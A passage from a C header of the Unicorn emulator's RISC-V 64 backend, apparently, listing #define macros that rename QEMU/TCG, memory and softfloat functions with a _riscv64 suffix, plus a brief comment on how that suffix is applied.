have_vsx_riscv64 #define flush_icache_range flush_icache_range_riscv64 #define s390_facilities s390_facilities_riscv64 #define tcg_dump_op tcg_dump_op_riscv64 #define tcg_dump_ops tcg_dump_ops_riscv64 #define tcg_gen_and_i64 tcg_gen_and_i64_riscv64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_riscv64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_riscv64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_riscv64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_riscv64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_riscv64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_riscv64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_riscv64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_riscv64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_riscv64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_riscv64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_riscv64 #define tcg_gen_or_i64 tcg_gen_or_i64_riscv64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_riscv64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_riscv64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_riscv64 #define tcg_gen_st_i64 tcg_gen_st_i64_riscv64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_riscv64 #define cpu_icount_to_ns cpu_icount_to_ns_riscv64 #define cpu_is_stopped cpu_is_stopped_riscv64 #define cpu_get_ticks cpu_get_ticks_riscv64 #define cpu_get_clock cpu_get_clock_riscv64 #define cpu_resume cpu_resume_riscv64 #define qemu_init_vcpu qemu_init_vcpu_riscv64 #define cpu_stop_current cpu_stop_current_riscv64 #define resume_all_vcpus resume_all_vcpus_riscv64 #define vm_start vm_start_riscv64 #define address_space_dispatch_compact address_space_dispatch_compact_riscv64 #define flatview_translate flatview_translate_riscv64 #define address_space_translate_for_iotlb
address_space_translate_for_iotlb_riscv64 #define qemu_get_cpu qemu_get_cpu_riscv64 #define cpu_address_space_init cpu_address_space_init_riscv64 #define cpu_get_address_space cpu_get_address_space_riscv64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_riscv64 #define cpu_exec_initfn cpu_exec_initfn_riscv64 #define cpu_exec_realizefn cpu_exec_realizefn_riscv64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_riscv64 #define cpu_watchpoint_insert cpu_watchpoint_insert_riscv64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_riscv64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_riscv64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_riscv64 #define cpu_breakpoint_insert cpu_breakpoint_insert_riscv64 #define cpu_breakpoint_remove cpu_breakpoint_remove_riscv64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_riscv64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_riscv64 #define cpu_abort cpu_abort_riscv64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_riscv64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_riscv64 #define flatview_add_to_dispatch flatview_add_to_dispatch_riscv64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_riscv64 #define qemu_ram_get_offset qemu_ram_get_offset_riscv64 #define qemu_ram_get_used_length qemu_ram_get_used_length_riscv64 #define qemu_ram_is_shared qemu_ram_is_shared_riscv64 #define qemu_ram_pagesize qemu_ram_pagesize_riscv64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_riscv64 #define qemu_ram_alloc qemu_ram_alloc_riscv64 #define qemu_ram_free qemu_ram_free_riscv64 #define qemu_map_ram_ptr qemu_map_ram_ptr_riscv64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_riscv64 #define qemu_ram_block_from_host qemu_ram_block_from_host_riscv64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_riscv64 #define cpu_check_watchpoint cpu_check_watchpoint_riscv64 #define iotlb_to_section iotlb_to_section_riscv64 #define address_space_dispatch_new address_space_dispatch_new_riscv64 #define address_space_dispatch_free address_space_dispatch_free_riscv64 #define flatview_read_continue flatview_read_continue_riscv64 #define address_space_read_full address_space_read_full_riscv64 #define address_space_write address_space_write_riscv64 #define address_space_rw address_space_rw_riscv64 #define cpu_physical_memory_rw cpu_physical_memory_rw_riscv64 #define address_space_write_rom address_space_write_rom_riscv64 #define cpu_flush_icache_range cpu_flush_icache_range_riscv64 #define cpu_exec_init_all cpu_exec_init_all_riscv64 #define address_space_access_valid address_space_access_valid_riscv64 #define address_space_map address_space_map_riscv64 #define address_space_unmap address_space_unmap_riscv64 #define cpu_physical_memory_map cpu_physical_memory_map_riscv64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_riscv64 #define cpu_memory_rw_debug cpu_memory_rw_debug_riscv64 #define qemu_target_page_size qemu_target_page_size_riscv64 #define qemu_target_page_bits qemu_target_page_bits_riscv64 #define qemu_target_page_bits_min qemu_target_page_bits_min_riscv64 #define target_words_bigendian target_words_bigendian_riscv64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_riscv64 #define ram_block_discard_range ram_block_discard_range_riscv64 #define ramblock_is_pmem ramblock_is_pmem_riscv64 #define page_size_init page_size_init_riscv64 #define set_preferred_target_page_bits 
set_preferred_target_page_bits_riscv64 #define finalize_target_page_bits finalize_target_page_bits_riscv64 #define cpu_outb cpu_outb_riscv64 #define cpu_outw cpu_outw_riscv64 #define cpu_outl cpu_outl_riscv64 #define cpu_inb cpu_inb_riscv64 #define cpu_inw cpu_inw_riscv64 #define cpu_inl cpu_inl_riscv64 #define memory_map memory_map_riscv64 #define memory_map_io memory_map_io_riscv64 #define memory_map_ptr memory_map_ptr_riscv64 #define memory_cow memory_cow_riscv64 #define memory_unmap memory_unmap_riscv64 #define memory_moveout memory_moveout_riscv64 #define memory_movein memory_movein_riscv64 #define memory_free memory_free_riscv64 #define flatview_unref flatview_unref_riscv64 #define address_space_get_flatview address_space_get_flatview_riscv64 #define memory_region_transaction_begin memory_region_transaction_begin_riscv64 #define memory_region_transaction_commit memory_region_transaction_commit_riscv64 #define memory_region_init memory_region_init_riscv64 #define memory_region_access_valid memory_region_access_valid_riscv64 #define memory_region_dispatch_read memory_region_dispatch_read_riscv64 #define memory_region_dispatch_write memory_region_dispatch_write_riscv64 #define memory_region_init_io memory_region_init_io_riscv64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_riscv64 #define memory_region_size memory_region_size_riscv64 #define memory_region_set_readonly memory_region_set_readonly_riscv64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_riscv64 #define memory_region_from_host memory_region_from_host_riscv64 #define memory_region_get_ram_addr memory_region_get_ram_addr_riscv64 #define memory_region_add_subregion memory_region_add_subregion_riscv64 #define memory_region_del_subregion memory_region_del_subregion_riscv64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_riscv64 #define memory_region_find memory_region_find_riscv64 #define memory_region_filter_subregions memory_region_filter_subregions_riscv64 #define memory_listener_register memory_listener_register_riscv64 #define memory_listener_unregister memory_listener_unregister_riscv64 #define address_space_remove_listeners address_space_remove_listeners_riscv64 #define address_space_init address_space_init_riscv64 #define address_space_destroy address_space_destroy_riscv64 #define memory_region_init_ram memory_region_init_ram_riscv64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_riscv64 #define find_memory_mapping find_memory_mapping_riscv64 #define exec_inline_op exec_inline_op_riscv64 #define floatx80_default_nan floatx80_default_nan_riscv64 #define float_raise float_raise_riscv64 #define float16_is_quiet_nan float16_is_quiet_nan_riscv64 #define float16_is_signaling_nan float16_is_signaling_nan_riscv64 #define float32_is_quiet_nan float32_is_quiet_nan_riscv64 #define float32_is_signaling_nan float32_is_signaling_nan_riscv64 #define float64_is_quiet_nan float64_is_quiet_nan_riscv64 #define float64_is_signaling_nan float64_is_signaling_nan_riscv64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_riscv64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_riscv64 #define floatx80_silence_nan floatx80_silence_nan_riscv64 #define propagateFloatx80NaN propagateFloatx80NaN_riscv64 #define float128_is_quiet_nan float128_is_quiet_nan_riscv64 #define float128_is_signaling_nan float128_is_signaling_nan_riscv64 #define float128_silence_nan float128_silence_nan_riscv64 #define float16_add float16_add_riscv64 #define float16_sub 
float16_sub_riscv64 #define float32_add float32_add_riscv64 #define float32_sub float32_sub_riscv64 #define float64_add float64_add_riscv64 #define float64_sub float64_sub_riscv64 #define float16_mul float16_mul_riscv64 #define float32_mul float32_mul_riscv64 #define float64_mul float64_mul_riscv64 #define float16_muladd float16_muladd_riscv64 #define float32_muladd float32_muladd_riscv64 #define float64_muladd float64_muladd_riscv64 #define float16_div float16_div_riscv64 #define float32_div float32_div_riscv64 #define float64_div float64_div_riscv64 #define float16_to_float32 float16_to_float32_riscv64 #define float16_to_float64 float16_to_float64_riscv64 #define float32_to_float16 float32_to_float16_riscv64 #define float32_to_float64 float32_to_float64_riscv64 #define float64_to_float16 float64_to_float16_riscv64 #define float64_to_float32 float64_to_float32_riscv64 #define float16_round_to_int float16_round_to_int_riscv64 #define float32_round_to_int float32_round_to_int_riscv64 #define float64_round_to_int float64_round_to_int_riscv64 #define float16_to_int16_scalbn float16_to_int16_scalbn_riscv64 #define float16_to_int32_scalbn float16_to_int32_scalbn_riscv64 #define float16_to_int64_scalbn float16_to_int64_scalbn_riscv64 #define float32_to_int16_scalbn float32_to_int16_scalbn_riscv64 #define float32_to_int32_scalbn float32_to_int32_scalbn_riscv64 #define float32_to_int64_scalbn float32_to_int64_scalbn_riscv64 #define float64_to_int16_scalbn float64_to_int16_scalbn_riscv64 #define float64_to_int32_scalbn float64_to_int32_scalbn_riscv64 #define float64_to_int64_scalbn float64_to_int64_scalbn_riscv64 #define float16_to_int16 float16_to_int16_riscv64 #define float16_to_int32 float16_to_int32_riscv64 #define float16_to_int64 float16_to_int64_riscv64 #define float32_to_int16 float32_to_int16_riscv64 #define float32_to_int32 float32_to_int32_riscv64 #define float32_to_int64 float32_to_int64_riscv64 #define float64_to_int16 float64_to_int16_riscv64 #define float64_to_int32 float64_to_int32_riscv64 #define float64_to_int64 float64_to_int64_riscv64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_riscv64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_riscv64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_riscv64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_riscv64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_riscv64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_riscv64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_riscv64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_riscv64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_riscv64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_riscv64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_riscv64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_riscv64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_riscv64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_riscv64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_riscv64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_riscv64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_riscv64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_riscv64 #define float16_to_uint16 float16_to_uint16_riscv64 #define float16_to_uint32 float16_to_uint32_riscv64 #define float16_to_uint64 float16_to_uint64_riscv64 #define 
float32_to_uint16 float32_to_uint16_riscv64 #define float32_to_uint32 float32_to_uint32_riscv64 #define float32_to_uint64 float32_to_uint64_riscv64 #define float64_to_uint16 float64_to_uint16_riscv64 #define float64_to_uint32 float64_to_uint32_riscv64 #define float64_to_uint64 float64_to_uint64_riscv64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_riscv64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_riscv64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_riscv64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_riscv64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_riscv64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_riscv64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_riscv64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_riscv64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_riscv64 #define int64_to_float16_scalbn int64_to_float16_scalbn_riscv64 #define int32_to_float16_scalbn int32_to_float16_scalbn_riscv64 #define int16_to_float16_scalbn int16_to_float16_scalbn_riscv64 #define int64_to_float16 int64_to_float16_riscv64 #define int32_to_float16 int32_to_float16_riscv64 #define int16_to_float16 int16_to_float16_riscv64 #define int64_to_float32_scalbn int64_to_float32_scalbn_riscv64 #define int32_to_float32_scalbn int32_to_float32_scalbn_riscv64 #define int16_to_float32_scalbn int16_to_float32_scalbn_riscv64 #define int64_to_float32 int64_to_float32_riscv64 #define int32_to_float32 int32_to_float32_riscv64 #define int16_to_float32 int16_to_float32_riscv64 #define int64_to_float64_scalbn int64_to_float64_scalbn_riscv64 #define int32_to_float64_scalbn int32_to_float64_scalbn_riscv64 #define int16_to_float64_scalbn int16_to_float64_scalbn_riscv64 #define int64_to_float64 int64_to_float64_riscv64 #define int32_to_float64 int32_to_float64_riscv64 #define int16_to_float64 int16_to_float64_riscv64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_riscv64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_riscv64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_riscv64 #define uint64_to_float16 uint64_to_float16_riscv64 #define uint32_to_float16 uint32_to_float16_riscv64 #define uint16_to_float16 uint16_to_float16_riscv64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_riscv64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_riscv64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_riscv64 #define uint64_to_float32 uint64_to_float32_riscv64 #define uint32_to_float32 uint32_to_float32_riscv64 #define uint16_to_float32 uint16_to_float32_riscv64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_riscv64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_riscv64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_riscv64 #define uint64_to_float64 uint64_to_float64_riscv64 #define uint32_to_float64 uint32_to_float64_riscv64 #define uint16_to_float64 uint16_to_float64_riscv64 #define float16_min float16_min_riscv64 #define float16_minnum float16_minnum_riscv64 #define float16_minnummag float16_minnummag_riscv64 #define float16_max float16_max_riscv64 #define float16_maxnum float16_maxnum_riscv64 #define float16_maxnummag float16_maxnummag_riscv64 #define float32_min float32_min_riscv64 #define float32_minnum float32_minnum_riscv64 #define float32_minnummag float32_minnummag_riscv64 #define float32_max 
float32_max_riscv64 #define float32_maxnum float32_maxnum_riscv64 #define float32_maxnummag float32_maxnummag_riscv64 #define float64_min float64_min_riscv64 #define float64_minnum float64_minnum_riscv64 #define float64_minnummag float64_minnummag_riscv64 #define float64_max float64_max_riscv64 #define float64_maxnum float64_maxnum_riscv64 #define float64_maxnummag float64_maxnummag_riscv64 #define float16_compare float16_compare_riscv64 #define float16_compare_quiet float16_compare_quiet_riscv64 #define float32_compare float32_compare_riscv64 #define float32_compare_quiet float32_compare_quiet_riscv64 #define float64_compare float64_compare_riscv64 #define float64_compare_quiet float64_compare_quiet_riscv64 #define float16_scalbn float16_scalbn_riscv64 #define float32_scalbn float32_scalbn_riscv64 #define float64_scalbn float64_scalbn_riscv64 #define float16_sqrt float16_sqrt_riscv64 #define float32_sqrt float32_sqrt_riscv64 #define float64_sqrt float64_sqrt_riscv64 #define float16_default_nan float16_default_nan_riscv64 #define float32_default_nan float32_default_nan_riscv64 #define float64_default_nan float64_default_nan_riscv64 #define float128_default_nan float128_default_nan_riscv64 #define float16_silence_nan float16_silence_nan_riscv64 #define float32_silence_nan float32_silence_nan_riscv64 #define float64_silence_nan float64_silence_nan_riscv64 #define float16_squash_input_denormal float16_squash_input_denormal_riscv64 #define float32_squash_input_denormal float32_squash_input_denormal_riscv64 #define float64_squash_input_denormal float64_squash_input_denormal_riscv64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_riscv64 #define roundAndPackFloatx80 roundAndPackFloatx80_riscv64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_riscv64 #define int32_to_floatx80 int32_to_floatx80_riscv64 #define int32_to_float128 int32_to_float128_riscv64 #define int64_to_floatx80 int64_to_floatx80_riscv64 #define int64_to_float128 int64_to_float128_riscv64 #define uint64_to_float128 uint64_to_float128_riscv64 #define float32_to_floatx80 float32_to_floatx80_riscv64 #define float32_to_float128 float32_to_float128_riscv64 #define float32_rem float32_rem_riscv64 #define float32_exp2 float32_exp2_riscv64 #define float32_log2 float32_log2_riscv64 #define float32_eq float32_eq_riscv64 #define float32_le float32_le_riscv64 #define float32_lt float32_lt_riscv64 #define float32_unordered float32_unordered_riscv64 #define float32_eq_quiet float32_eq_quiet_riscv64 #define float32_le_quiet float32_le_quiet_riscv64 #define float32_lt_quiet float32_lt_quiet_riscv64 #define float32_unordered_quiet float32_unordered_quiet_riscv64 #define float64_to_floatx80 float64_to_floatx80_riscv64 #define float64_to_float128 float64_to_float128_riscv64 #define float64_rem float64_rem_riscv64 #define float64_log2 float64_log2_riscv64 #define float64_eq float64_eq_riscv64 #define float64_le float64_le_riscv64 #define float64_lt float64_lt_riscv64 #define float64_unordered float64_unordered_riscv64 #define float64_eq_quiet float64_eq_quiet_riscv64 #define float64_le_quiet float64_le_quiet_riscv64 #define float64_lt_quiet float64_lt_quiet_riscv64 #define float64_unordered_quiet float64_unordered_quiet_riscv64 #define floatx80_to_int32 floatx80_to_int32_riscv64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_riscv64 #define floatx80_to_int64 floatx80_to_int64_riscv64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_riscv64 #define floatx80_to_float32 
floatx80_to_float32_riscv64 #define floatx80_to_float64 floatx80_to_float64_riscv64 #define floatx80_to_float128 floatx80_to_float128_riscv64 #define floatx80_round floatx80_round_riscv64 #define floatx80_round_to_int floatx80_round_to_int_riscv64 #define floatx80_add floatx80_add_riscv64 #define floatx80_sub floatx80_sub_riscv64 #define floatx80_mul floatx80_mul_riscv64 #define floatx80_div floatx80_div_riscv64 #define floatx80_rem floatx80_rem_riscv64 #define floatx80_sqrt floatx80_sqrt_riscv64 #define floatx80_eq floatx80_eq_riscv64 #define floatx80_le floatx80_le_riscv64 #define floatx80_lt floatx80_lt_riscv64 #define floatx80_unordered floatx80_unordered_riscv64 #define floatx80_eq_quiet floatx80_eq_quiet_riscv64 #define floatx80_le_quiet floatx80_le_quiet_riscv64 #define floatx80_lt_quiet floatx80_lt_quiet_riscv64 #define floatx80_unordered_quiet floatx80_unordered_quiet_riscv64 #define float128_to_int32 float128_to_int32_riscv64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_riscv64 #define float128_to_int64 float128_to_int64_riscv64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_riscv64 #define float128_to_uint64 float128_to_uint64_riscv64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_riscv64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_riscv64 #define float128_to_uint32 float128_to_uint32_riscv64 #define float128_to_float32 float128_to_float32_riscv64 #define float128_to_float64 float128_to_float64_riscv64 #define float128_to_floatx80 float128_to_floatx80_riscv64 #define float128_round_to_int float128_round_to_int_riscv64 #define float128_add float128_add_riscv64 #define float128_sub float128_sub_riscv64 #define float128_mul float128_mul_riscv64 #define float128_div float128_div_riscv64 #define float128_rem float128_rem_riscv64 #define float128_sqrt float128_sqrt_riscv64 #define float128_eq float128_eq_riscv64 #define float128_le float128_le_riscv64 #define float128_lt float128_lt_riscv64 #define float128_unordered float128_unordered_riscv64 #define float128_eq_quiet float128_eq_quiet_riscv64 #define float128_le_quiet float128_le_quiet_riscv64 #define float128_lt_quiet float128_lt_quiet_riscv64 #define float128_unordered_quiet float128_unordered_quiet_riscv64 #define floatx80_compare floatx80_compare_riscv64 #define floatx80_compare_quiet floatx80_compare_quiet_riscv64 #define float128_compare float128_compare_riscv64 #define float128_compare_quiet float128_compare_quiet_riscv64 #define floatx80_scalbn floatx80_scalbn_riscv64 #define float128_scalbn float128_scalbn_riscv64 #define softfloat_init softfloat_init_riscv64 #define tcg_optimize tcg_optimize_riscv64 #define gen_new_label gen_new_label_riscv64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_riscv64 #define tcg_expand_vec_op tcg_expand_vec_op_riscv64 #define tcg_register_jit tcg_register_jit_riscv64 #define tcg_tb_insert tcg_tb_insert_riscv64 #define tcg_tb_remove tcg_tb_remove_riscv64 #define tcg_tb_lookup tcg_tb_lookup_riscv64 #define tcg_tb_foreach tcg_tb_foreach_riscv64 #define tcg_nb_tbs tcg_nb_tbs_riscv64 #define tcg_region_reset_all tcg_region_reset_all_riscv64 #define tcg_region_init tcg_region_init_riscv64 #define tcg_code_size tcg_code_size_riscv64 #define tcg_code_capacity tcg_code_capacity_riscv64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_riscv64 #define tcg_malloc_internal tcg_malloc_internal_riscv64 #define tcg_pool_reset tcg_pool_reset_riscv64 #define tcg_context_init 
tcg_context_init_riscv64 #define tcg_tb_alloc tcg_tb_alloc_riscv64 #define tcg_prologue_init tcg_prologue_init_riscv64 #define tcg_func_start tcg_func_start_riscv64 #define tcg_set_frame tcg_set_frame_riscv64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_riscv64 #define tcg_temp_new_internal tcg_temp_new_internal_riscv64 #define tcg_temp_new_vec tcg_temp_new_vec_riscv64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_riscv64 #define tcg_temp_free_internal tcg_temp_free_internal_riscv64 #define tcg_const_i32 tcg_const_i32_riscv64 #define tcg_const_i64 tcg_const_i64_riscv64 #define tcg_const_local_i32 tcg_const_local_i32_riscv64 #define tcg_const_local_i64 tcg_const_local_i64_riscv64 #define tcg_op_supported tcg_op_supported_riscv64 #define tcg_gen_callN tcg_gen_callN_riscv64 #define tcg_op_remove tcg_op_remove_riscv64 #define tcg_emit_op tcg_emit_op_riscv64 #define tcg_op_insert_before tcg_op_insert_before_riscv64 #define tcg_op_insert_after tcg_op_insert_after_riscv64 #define tcg_cpu_exec_time tcg_cpu_exec_time_riscv64 #define tcg_gen_code tcg_gen_code_riscv64 #define tcg_gen_op1 tcg_gen_op1_riscv64 #define tcg_gen_op2 tcg_gen_op2_riscv64 #define tcg_gen_op3 tcg_gen_op3_riscv64 #define tcg_gen_op4 tcg_gen_op4_riscv64 #define tcg_gen_op5 tcg_gen_op5_riscv64 #define tcg_gen_op6 tcg_gen_op6_riscv64 #define tcg_gen_mb tcg_gen_mb_riscv64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_riscv64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_riscv64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_riscv64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_riscv64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_riscv64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_riscv64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_riscv64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_riscv64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_riscv64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_riscv64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_riscv64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_riscv64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_riscv64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_riscv64 #define tcg_gen_div_i32 tcg_gen_div_i32_riscv64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_riscv64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_riscv64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_riscv64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_riscv64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_riscv64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_riscv64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_riscv64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_riscv64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_riscv64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_riscv64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_riscv64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_riscv64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_riscv64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_riscv64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_riscv64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_riscv64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_riscv64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_riscv64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_riscv64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_riscv64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_riscv64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_riscv64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_riscv64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_riscv64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_riscv64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_riscv64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_riscv64 
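/*
 * The UNICORN_ARCH_POSTFIX macro defined at the top of this header lets
 * architecture-neutral glue code paste the suffix onto a name instead of
 * spelling it out. A hedged sketch using QEMU-style token-pasting helpers
 * (the symbol `bar` is hypothetical and not part of the rename list above):
 *
 *     #define xglue(x, y) x##y
 *     #define glue(x, y) xglue(x, y)
 *     // In this build, glue(bar, UNICORN_ARCH_POSTFIX)() expands to
 *     // bar_riscv64():
 *     glue(bar, UNICORN_ARCH_POSTFIX)();
 *
 * At run time, uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc) selects the
 * backend whose symbols carry this suffix.
 */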
#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_riscv64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_riscv64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_riscv64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_riscv64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_riscv64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_riscv64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_riscv64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_riscv64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_riscv64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_riscv64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_riscv64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_riscv64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_riscv64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_riscv64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_riscv64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_riscv64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_riscv64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_riscv64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_riscv64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_riscv64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_riscv64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_riscv64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_riscv64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_riscv64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_riscv64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_riscv64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_riscv64 #define tcg_gen_div_i64 tcg_gen_div_i64_riscv64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_riscv64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_riscv64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_riscv64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_riscv64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_riscv64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_riscv64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_riscv64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_riscv64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_riscv64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_riscv64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_riscv64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_riscv64 #define tcg_gen_not_i64 tcg_gen_not_i64_riscv64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_riscv64 #define tcg_gen_eqv_i64 